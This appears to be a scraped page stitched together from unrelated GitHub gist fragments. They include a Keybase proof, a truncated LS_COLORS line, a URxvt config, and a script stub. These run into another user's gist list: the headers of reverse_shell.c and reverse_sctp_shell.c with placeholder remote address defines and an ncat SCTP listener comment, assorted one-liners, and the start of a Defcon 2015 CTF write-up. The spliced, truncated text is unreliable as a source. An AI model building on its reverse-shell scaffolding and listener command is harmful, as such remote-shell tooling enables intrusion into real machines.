Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am muzluk on github.
  • I am muzluk (https://keybase.io/muzluk) on keybase.
  • I have a public key whose fingerprint is 54BE 136A 633A CF38 E133 F65E 3B48 7E9F 1B4E 75F2

To claim this, I am signing this object:

export LS_COLORS="no=00;38;5;244:rs=0:di=00;38;5;33:ln=01;38;5;37:mh=00:pi=48;5;230;38;5;136;01:so=48;5;230;38;5;136;01:do=48;5;230;38;5;136;01:bd=48;5;230;38;5;244;01:cd=48;5;230;38;5;244;01:or=48;5;235;38;5;160:su=48;5;160;38;5;230:sg=48;5;136;38;5;230:ca=30;41:tw=48;5;64;38;5;230:ow=48;5;235;38;5;33:st=48;5;33;38;5;230:ex=01;38;5;64:*.tar=00;38;5;61:*.tgz=01;38;5;61:*.arj=01;38;5;61:*.taz=01;38;5;61:*.lzh=01;38;5;61:*.lzma=01;38;5;61:*.tlz=01;38;5;61:*.txz=01;38;5;61:*.zip=01;38;5;61:*.z=01;38;5;61:*.Z=01;38;5;61:*.dz=01;38;5;61:*.gz=01;38;5;61:*.lz=01;38;5;61:*.xz=01;38;5;61:*.bz2=01;38;5;61:*.bz=01;38;5;61:*.tbz=01;38;5;61:*.tbz2=01;38;5;61:*.tz=01;38;5;61:*.deb=01;38;5;61:*.rpm=01;38;5;61:*.jar=01;38;5;61:*.rar=01;38;5;61:*.ace=01;38;5;61:*.zoo=01;38;5;61:*.cpio=01;38;5;61:*.7z=01;38;5;61:*.rz=01;38;5;61:*.apk=01;38;5;61:*.gem=01;38;5;61:*.jpg=00;38;5;136:*.JPG=00;38;5;136:*.jpeg=00;38;5;136:*.gif=00;38;5;136:*.bmp=00;38;5;136:*.pbm=00;38;5;136:*.pgm=00;38;5;136:*.ppm=00;38;5;136:*.tga=00;38;5;136:*.xbm
! URxvt
URxvt*.depth: 32
URxvt*.transparent: true
URxvt*.shading: 20
URxvt*.scrollBar: false
URxvt*.scrollTtyKeypress: true
URxvt*.scrollTtyOutput: false
URxvt*.urgentOnBell: true
URxvt*.visualBell: true
URxvt*.saveLines: 65535
#!/bin/bash
usage()
{
cat << EOF
usage: $0 options
This script launches virt-install with the specified arguments.
OPTIONS:
@0xabe-io
0xabe-io / reverse_shell.c
Created January 6, 2015 15:24
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@0xabe-io
0xabe-io / flv2mp4.sh
Created January 13, 2015 12:15
Convert flv without re-encoding
ffmpeg -i "$fin" -c copy -copyts "${fin%.*}.mp4"
docker rmi $(docker images -qf "dangling=true")
@0xabe-io
0xabe-io / firefox_config
Created February 20, 2015 15:47
Disable RTCPeerConnection in Firefox
about:config -> media.peerconnection.enabled
@0xabe-io
0xabe-io / babyecho.rst
Last active August 29, 2015 14:21
writeup of the babyecho challenge during the Defcon 2015 qualifications

Defcon Qualifications 2015 - babyecho

babyecho is an ELF 32bit statically linked binary that reads 13 bytes at time and outputs it back:

$ ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
Reading 13 bytes (stdout)
123456789012345678901234567890 (stdin)
@0xabe-io
0xabe-io / reverse_sctp_shell.c
Created August 6, 2015 08:52
Simple C code to create a reverse shell over SCTP
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>